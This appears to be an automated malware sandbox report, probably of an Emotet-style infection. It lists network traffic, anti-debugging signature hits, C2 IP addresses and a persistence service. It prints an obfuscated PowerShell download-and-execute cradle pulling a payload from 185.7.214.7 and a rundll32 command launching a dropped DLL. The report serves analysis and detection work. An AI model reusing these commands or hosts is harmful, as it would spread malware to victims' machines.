Data received | ies.css?ver=13.4' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='http://sarvaero.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.3' media='all' /> <link rel='stylesheet' id='rs-plugin-settings-css' href='http://sarvaero.com/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.2.23' media='all' /> <style id='rs-plugin-settings-inline-css'> #rs-demo-id {} </style> <link rel='stylesheet' id='joinchat-css' href='http://sarvaero.com/wp-content/plugins/creame-whatsapp-me/public/css/joinchat.min.css?ver=4.1.15' media='all' /> <style id='joinchat-inline-css'> .joinchat{ --red:37; --green:211; --blue:102; } </style> <link rel='stylesheet' id='punte-fonts-css' href='https://fonts.googleapis.com/css?family=Roboto%3A400%2C400i%2C700%2C700i%26display%3Dswap%7COpen%2BSans%3A400%2C400i%2C700%2C700i%26display%3Dswap&subset=latin%2Clatin-ext&ver=1.0' media='all' /> <link rel='stylesheet' id='punte-headers-css' href='http://sarvaero.com/wp-content/themes/punte/a |
Data received | ssets/css/headers.css?ver=1.0' media='all' /> <link rel='stylesheet' id='punte-footers-css' href='http://sarvaero.com/wp-content/themes/punte/assets/css/footers.css?ver=1.0' media='all' /> <link rel='stylesheet' id='punte-main-css' href='http://sarvaero.com/wp-content/themes/punte/assets/css/main.css?ver=1.0' media='all' /> <link rel='stylesheet' id='punte-style-css' href='http://sarvaero.com/wp-content/themes/punte/style.css?ver=5.8.3' media='all' /> <style id='punte-style-inline-css'> body{background-color:#FFFFFF} .punte-container{width:1280px} .header-layout1 .site-branding img,.header-layout5 .site-branding img,.header-layout6 .site-branding img{max-height:70px} .header-layout6 .is-sticky .site-branding img{max-height:50px} .header-layout1 .top-header,.header-layout3 .top-header,.header-layout5 .main-header,ul.punte-main-menu ul,.video-controls,.bttn-style1 a,.bttn-style3 a,.bttn-style5 a,.style3.punte-pricing-table,.style4.punte-pricing-table .ppt-header,.style4.punte-pricing-table .ppt-header:before |
Data received | ,.style4.punte-pricing-table .ppt-header:after,.style5.punte-pricing-table .ppt-header,.style5.punte-pricing-table .ppt-icon,.style5.punte-pricing-table .ppt-footer a,.style6.punte-pricing-table .ppt-footer a,.style6.punte-pricing-table .ppt-price,.style1.punte-team .pt-social-icons a,.style2.punte-team .pt-social-icons a,.style3.punte-team .pt-social-icons a,.style4.punte-team .pt-social-icons a,.style3.punte-testimonial .ptl-header,.pagination .page-numbers,.blog-style3 .entry-readmore a:hover,#pune-back-top,.sidebar-style3 .widget-title span:after,button,input[type="button"],input[type="reset"],input[type="submit"],.pws1-catname-wrapper a,.pws1-catname-wrapper a:before,.pnt-list .owl-theme .owl-nav [class*=owl-]:hover,.punte-portfolio-labels li.is-checked:after,.pnt-title,.style6.punte-pricing-table .ppt-heading:after,.pbp-pagination .page-numbers.current,.pbp-pagination a.page-numbers:hover,.punte-blog-post.style3 .punte-blog-list-inner,.punte-blog-post.style3 .punte-blog-list.pbp-even .punte-blog-list-in |
Data received | ner:before,.punte-blog-post.style3 .punte-blog-list.pbp-odd .punte-blog-list-inner:before,.punte-blog-post.style3 .pbp-line,.pbs-slide-caption .pbs-category a,.pbs-slider-wrap .owl-dots .owl-dot.active span,.pbs-slider-wrap .owl-dots .owl-dot:hover span,.punte-pricing-table.style2 .ppt-heading,.punte-pricing-table.style2:hover .ppt-icon,.style3.punte-pricing-table.punte-pricing-table,.style4.punte-pricing-table .ppt-button,.style5.punte-pricing-table .ppt-heading,.style5.punte-pricing-table .ppt-heading::before,.style5.punte-pricing-table .ppt-heading::after,.style1.punte-pricing-table .ppt-button,.punte-counter.style3 .pc-icon,.pbg-category a,.pbs-slide-caption .pbs-category a,.pwtb-catname-wrapper a.pwtb-active,.pwtb-catname-wrapper a:hover,.menu-item-punte-cart .mCSB_scrollTools .mCSB_dragger .mCSB_dragger_bar,.blog-style1 .entry-readmore a,blockquote:before{background-color:#308ac8} ul.punte-main-menu>li>a:hover svg{fill:#308ac8} .style1.punte-pricing-table .ppt-header{background-color:#3497dc} .style1.pu |
Data received | nte-pricing-table .ppt-button,.style4.punte-pricing-table .ppt-button,.style5.punte-pricing-table .ppt-heading,.style5.punte-pricing-tab |
Data received | |
Data received | 1 |
Data received | f |
Data received | 8 |
Data received | |
Data received | |
Data received | le .ppt-heading:before,.style5.punte-pricing-table .ppt-heading:after,.style6.punte-pricing-table .ppt-heading:after,#pune-back-top:hover,button:hover,input[type="button"]:hover,input[type="reset"]:hover,input[type="submit"]:hover,.pws1-catname-wrapper a.p-active,.pws1-catname-wrapper a.p-active:before,.pws1-catname-wrapper a:hover,.pws1-catname-wrapper a:hover:before,.bttn-style1 a:hover{background-color:#2b7cb4} a,.bttn-style2 a,.bttn-style6 a,.style3.punte-pricing-table .ppt-icon,.style6.punte-pricing-table .ppt-icon,.punte-blog-post .cat-links a:hover,.blog-style1 .entry-share a:hover,.blog-style3 .entry-share a:hover,.blog-style4 .entry-share a:hover,.punte-blog-post .entry-header a:hover,.comment-list a:hover,.post-navigation a:hover,.punte-related-post-wrap h4 a:hover,.punte-news-ticker h4 a:hover,.punte-blog-block h4 a:hover,.pbp-pagination .page-numbers,.punte-pricing-table.style2 .ppt-button:hover,.punte-counter.style3 .pc-value,.blog-style1 .entry-readmore a:hover,.blog-style1 .entry-readmore a:foc |
Data received | us{color:#308ac8} a:hover,.woocommerce .product_meta a:hover{color:#2b7cb4} .bttn-style2.punte-pricing-table a,.bttn-style6.punte-pricing-table a,.style6.punte-pricing-table,.blog-style1 .entry-readmore a:hover,.blog-style3 .entry-readmore a:hover,.sidebar-style2 .widget-title,.sidebar-style5 .widget,.sidebar-style4 .widget-title,.punte-blog-header,.pbp-pagination .page-numbers,.style1.punte-blockquote,.style2.punte-blockquote,.punte-pricing-table.style2:hover .ppt-header,.punte-pricing-table.style2 .ppt-button:hover,.punte-counter.style3,.pbg-category a,.pbs-slide-caption .pbs-category a,.pwtb-catname-wrapper a,.blog-style1 .entry-readmore a{border-color:#308ac8} .style1.punte-pricing-table .ppt-header:after{border-color:#308ac8 #308ac8 transparent transparent} .style1.punte-pricing-table .ppt-header:before{border-color:transparent transparent #308ac8 #308ac8} .style2 .ppt-header:before{border-color:transparent #308ac8 #308ac8 transparent} .style3 .pnt-title span,.punte-blog-post.style3 .punte-blog-list.pbp- |
Data received | even .punte-blog-list-inner:after,.blog-style1.sticky{border-left-color:#308ac8 } .punte-blog-post.style3 .punte-blog-list.pbp-odd .punte-blog-list-inner:after{border-right-color:#308ac8 } .style6.punte-pricing-table .ppt-price{box-shadow:0 0 0 5px #FFF,0 0 0 7px #308ac8} .punte-blog-post.style3 .punte-blog-list.pbp-odd .punte-blog-list-inner:before,.punte-blog-post.style3 .punte-blog-list.pbp-even .punte-blog-list-inner:before{box-shadow:0 0px 0px 3px #3497dc} .header-layout1 .main-header,.header-layout1 .site-branding,.header-layout5 .main-header,.header-layout5 .site-branding,.header-layout6 .main-header,.header-layout6 .site-branding{height:90px} .header-layout6 .is-sticky .main-header,.header-layout6 .is-sticky .site-branding{height:70px} .header-layout1 ul.punte-main-menu > li > a,.header-layout1 ul.punte-main-menu > li.header-search i,.header-layout5 ul.punte-main-menu > li > a,.header-layout5 ul.punte-main-menu > li.header-search i,.header-layout6 ul.punte-main-menu > li > a,.header-layout6 ul.punte-m |
Data received | ain-menu > li.header-search i{line-height:90px} .header-layout6 .is-sticky ul.punte-main-menu > li > a,.header-layout6 .is-sticky ul.punte-main-menu > li.header-search i{line-height:70px} .header-layout5 .top-header{padding-bottom:55px !important} .header-layout5 .top-header + .main-header-wrap,.header-layout5 .top-header + .main-header-wrap + .punte-mobile-header{margin-top:-45px} .header-layout5 + #content{transform:translateY(-45px);-webkit-transform:translateY(-45px);-ms-transform:translateY(-45px);margin-bottom:-45px} .header-layout5 + #content .page-header .page-title-wrap{margin-top:45px} .header-layout5 + .site-content > .punte-container:first-child{margin-top:85px} .site-header .site-branding{padding-top:10px;padding-right:10px;padding-bottom:10px;padding-left:0} .punte-main-menu{font-family:'Open Sans';font-size:16px;font-weight:400;font-style:normal;text-transform:uppercase;letter-spacing:} .punte-main-menu a{color:#ffffff;font-weight:400;font-style:normal} #primary{width:70%} .sidebar{width:27%} # |
Data received | colophon{background-color:#23242f;color:#EEEEEE;font-size:14px} .site-footer a{color:#CCCCCC} .site-footer a:hover{color:#AAAAAA} #bottom-footer .punte-container{background:#1f202a} ul.punte-main-menu > li > a,.header-layout4 .header-search-wrapper .search-field,.header-layout4 |
Data received | .header-search-wrapper .search-field,.header-layout4 .header-search-wrapper .search-field,.header-layout4 .header-search-wrapper .search-field{color:#ffffff} .header-layout4 .header-search-wrapper .search-field::-webkit-input-placeholder,.header-layout4 .header-search-wrapper .search-field::-moz-placeholder,.header-layout4 .header-search-wrapper .search-field:-ms-input-placeholder,.header-layout4 .header-search-wrapper .search-field:-moz-placeholder{color:#ffffff;opacity:1} ul.punte-main-menu > li > a:hover,.home .punte-transparent-header ul.punte-main-menu > li > a:hover{color:#1e73be} nav.main-navigation ul.punte-main-menu > li.menu-item-has-children > a:hover:after,.home .punte-transparent-header ul.punte-main-menu > li.menu-item-has-children > a:hover:after{border-color:#1e73be} ul.punte-main-menu ul{background:rgba(37,188,234,0.8)} ul.punte-main-menu ul li a{color:#2e3434} ul.punte-main-menu ul li a:hover{color:#1e73be} .main-header,.header-layout5 .main-header,.punte-mobile-header{background:rgba(46,52 |
Data received | ,52,0.6)} .header-layout1 .site-branding,.header-layout1 .main-header,.header-layout2 .main-header,.header-layout3 .main-header,.header-layout1 .menu-item-search,.header-layout2 .site-branding,.header-layout2 .top-header,.header-layout3 .main-navigation,.header-layout2,.punte-mobile-header{border-color:#292e2e} .site-header .top-header{padding-top:10px;padding-bottom:10px;color:#FFFFFF} .site-header .top-header,.top-menu ul{background:rgba(37,188,234,1)} .site-header .top-header a{color:#FAFAFA} .site-header .top-header a:hover{color:#EEEEEE} .punte-custom-footer{color:#ffffff}.punte-custom-footer a{color:#ffffff}.punte-custom-footer a:hover{color:#25bcea} @media screen and (max-width:768px){.main-header,.main-header-wrap,.menu-item-search{display:none !important} .punte-mobile-header{display:block !important} .header-layout4{position:relative;width:auto;max-width:none;box-shadow:none} .header-layout4 + .site-content,.header-layout4 + .site-content + footer{margin-left:0}} @media screen and (max-width:1320px) |
Data received | {#page,.punte-container{width:100%} .punte-container{padding:0 5%}} @media screen and (max-width:1320px){.both-sidebar .site-content > .punte-container,.both-left-sidebar .site-content > .punte-container,.both-right-sidebar .site-content > .punte-container{padding:0 5%} .both-sidebar #primary,.both-left-sidebar #primary,.both-right-sidebar #primary{float:none} .both-sidebar .sidebar-left,.both-left-sidebar .sidebar-left,.both-right-sidebar .sidebar-left{width:48%;margin:0;float:left} .both-sidebar .sidebar-right,.both-left-sidebar .sidebar-right,.both-right-sidebar .sidebar-right{width:48%;margin:0;right:0;float:right}} </style> <link rel='stylesheet' id='punte-responsive-css' href='http://sarvaero.com/wp-content/themes/punte/assets/css/responsive.css?ver=1.0' media='all' /> <link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Open%20Sans:400&subset=latin&display=swap&ver=1624512099" /><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open%20Sans:400& |
Data received | #038;subset=latin&display=swap&ver=1624512099" media="print" onload="this.media='all'"><noscript><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open%20Sans:400&subset=latin&display=swap&ver=1624512099" /></noscript><script src='http://sarvaero.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0' id='jquery-core-js'></script> <script src='http://sarvaero.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script> <script src='http://sarvaero.com/wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.2.23' id='tp-tools-js'></script> <script src='http://sarvaero.com/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.2.23' id='revmin |
Data received | -js'></script> <link rel="https://api.w.org/" href="http://sarvaero.com/wp-json/" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://sarvaero.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://sarvaero.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.8.3" /> <meta name="framework" content="Redux 4.3.5" /><style>.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <style type="text/css"> .site-title a, .site-description { position: absolute; clip: rect(1px, 1px, 1px, 1px); } </style> <meta name="generator" content="Powered by Slider Revolution 6.2.23 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /> <link rel="icon" href="http://sarvaero.com/wp-content/uploads/2021/06/cropped-SARV_Aero_up-1-32x32.png" sizes="32x32" /> <link rel="icon" href="http://sarvaero.com/wp-content/uploads/2021/0 |
Data received | 6/cropped-SARV_Aero_up-1-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon" href="http://sarvaero.com/wp-content/uploads/2021/06/cropped-SARV_Aero_up-1-180x180.png" /> <meta name="msapplication-TileImage" content="http://sarvaero.com/wp-content/uploads/2021/06/cropped-SARV_Aero_up-1-270x270.png" /> <script type="text/javascript">function setREVStartSize(e){ //window.requestAnimationFrame(function() { window.RSIW = window.RSIW===undefined ? window.innerWidth : window.RSIW; window.RSIH = window.RSIH===undefined ? window.innerHeight : window.RSIH; try { var pw = document.getElementById(e.c).parentNode.offsetWidth, newh; pw = pw===0 || isNaN(pw) ? window.RSIW : pw; e.tabw = e.tabw===undefined ? 0 : parseInt(e.tabw); e.thumbw = e.thumbw===undefined ? 0 : parseInt(e.thumbw); e.tabh = e.tabh===undefined ? 0 : parseInt(e.tabh); e.thumbh = e.thumbh===undefined ? 0 : parseInt(e.thumbh); e.tabhide = e.tabhide===undefined ? 0 : p |
Data received | arseInt(e.tabhide); e.thumbhide = e.thumbhide===undefined ? 0 : parseInt(e.thumbhide); e.mh = e.mh===undefined || e.mh=="" || e.mh==="auto" ? 0 : parseInt(e.mh,0); if(e.layout==="fullscreen" || e.l==="fullscreen") newh = Math.max(e.mh,window.RSIH); else{ e.gw = Array.isArray(e.gw) ? e.gw : [e.gw]; for (var i in e.rl) if (e.gw[i]===undefined || e.gw[i]===0) e.gw[i] = e.gw[i-1]; e.gh = e.el===undefined || e.el==="" || (Array.isArray(e.el) && e.el.length==0)? e.gh : e.el; e.gh = Array.isArray(e.gh) ? e.gh : [e.gh]; for (var i in e.rl) if (e.gh[i]===undefined || e.gh[i]===0) e.gh[i] = e.gh[i-1]; var nl = new Array(e.rl.length), ix = 0, sl; e.tabw = e.tabhide>=pw ? 0 : e.tabw; e.thumbw = e.thumbhide>=pw ? 0 : e.thumbw; e.tabh = e.tabhide>=pw ? 0 : e.tabh; e.thumbh = e.thumbhide>=pw ? 0 : e.thumbh; for (var i in e.rl) nl[i] = e.rl[i]<window. |
Data sent | GET /ve/ve.png HTTP/1.1 Host: 185.7.214.7 Connection: Keep-Alive |
Data sent | v raçx(ZBl´£Í´hLK¤Äwv§ÔÖ%r / 5 ÀÀÀ À 2 8 1ÿ soomaal.softuvo.xyz |
Data sent | F BAYxX6ÿ6R@;Gróe kä_+õ¶Þ-d@Ì"êìS{ØBSȽ!ál@ÌÅvÑ®}drî4l 0®4î®cÑõ!]MQý¶æëÿ¡ çûèT8xÍ[º¯~ c¨úÎA |
Data sent | GET /assets/W8jp7/ HTTP/1.1 Host: ippur.ufrj.br Connection: Keep-Alive |
Data sent | p laçx2-=EñCݯA廼2êR ú¥Î / 5 ÀÀÀ À 2 8 +ÿ ippur.ufrj.br |
Data sent | p laçx3Dq|C ö>l1O9Öf×iø×6ÝÆ¼¯¾ / 5 ÀÀÀ À 2 8 +ÿ ippur.ufrj.br |
Data sent | l haçx4KwÀu+PÜwÃdÈ¢ÿ>ë̸pú² / 5 ÀÀÀ À 2 8 'ÿ scoute.ai |
Data sent | F BAó®å¤u½÷*5B÷L¯ÆWfZx/ðKL·®(îÑÝ4ì¸L5= Û´ëj¥JÑoébÑRÇ} 0ÂA ÊñÞoÏorÔ3~ªÁFþî¡<¤ZåLegDÁÖ'¬IVÃ3m] |
Data sent | | xaçx4,+ðÐ\ø«±ÎûÃjã¬ns44Ãöa / 5 ÀÀÀ À 2 8 7ÿ wordpress.pixeleyenow.com |
Data sent | 0í¹ôtIÜ$öK>³"4 mÁ\Ny¼½$£LRë Âr^mo,0ËH$¢|¸JÙÄ´½°H`\¼8ߤdåág¤ÄY«ëzSnfMÔÑæèJìpÒ&)»iÒ¨ª4ªÕV DÁpF0%9Õaµ"ì~×àrý**zùN§êß*&ýóNä,pB°qGë¤çH92>oÙ¼9§ ÷<Ê9Ì>ªi6lôfǼ%=Çv[¶C?¿-`)1ô¸ûßvp·vQ6|sÊrAVØu3cT¸É8âþÛ¦·áùMH¨³Û] 0ëo®×:RGæõç"Fx÷ÐYÄgì onû^®ôï6áî<>D\c¸ |
Data sent | GET /assets/BRrGH0HSkc/ HTTP/1.1 Host: sarvaero.com Connection: Keep-Alive |
Data sent | GET /wp-admin/mDk/ HTTP/1.1 Host: atplengineering.com Connection: Keep-Alive |
Data sent | GET /-/gkUMZLMfkddmFdMlJ/ HTTP/1.1 Host: www2.s12.xrea.com Connection: Keep-Alive |
process | rundll32.exe |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2336 CREDAT:145409 |
host | 103.8.26.102 | |||
host | 103.8.26.103 | |||
host | 104.168.155.129 | |||
host | 117.18.232.200 | |||
host | 131.100.24.231 | |||
host | 178.63.25.185 | |||
host | 178.79.147.66 | |||
host | 185.7.214.7 | |||
host | 192.254.71.210 | |||
host | 203.114.109.124 | |||
host | 207.38.84.195 | |||
host | 209.59.138.75 | |||
host | 212.237.17.99 | |||
host | 217.182.143.207 | |||
host | 45.118.115.99 | |||
host | 45.142.114.231 | |||
host | 45.176.232.124 | |||
host | 46.55.222.11 | |||
host | 51.38.71.0 | |||
host | 51.68.175.8 | |||
host | 58.227.42.236 | |||
host | 79.172.212.216 |
service_name | mwvuijgsfryxorv.pgq | service_path | C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Uswzujvhdnzp\mwvuijgsfryxorv.pgq",qDAlUNWiucEQgv |
parent_process | iexplore.exe | martian_process | powershell -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/ve/ve.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X |
parent_process | iexplore.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/ve/ve.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X | ||||||
parent_process | iexplore.exe | martian_process | powershell -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/ve/ve.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString |
file | C:\Windows\SysWOW64\Uswzujvhdnzp\mwvuijgsfryxorv.pgq:Zone.Identifier |
file | C:\Users\Public\Documents\ssd.dll |
file | C:\Windows\System32\cmd.exe |
dead_host | 192.168.56.103:49235 |
dead_host | 192.168.56.103:49212 |
dead_host | 192.168.56.103:49217 |
dead_host | 192.168.56.103:49236 |
dead_host | 45.142.114.231:8080 |
dead_host | 203.114.109.124:443 |
dead_host | 178.63.25.185:443 |
dead_host | 192.168.56.103:49233 |
dead_host | 207.38.84.195:8080 |
dead_host | 192.168.56.103:49226 |
dead_host | 192.254.71.210:443 |
dead_host | 192.168.56.103:49211 |
dead_host | 217.182.143.207:443 |
dead_host | 178.79.147.66:8080 |
dead_host | 192.168.56.103:49210 |
dead_host | 45.176.232.124:443 |
dead_host | 58.227.42.236:80 |
dead_host | 212.237.17.99:8080 |
dead_host | 192.168.56.103:49227 |
dead_host | 79.172.212.216:8080 |
dead_host | 192.168.56.103:49228 |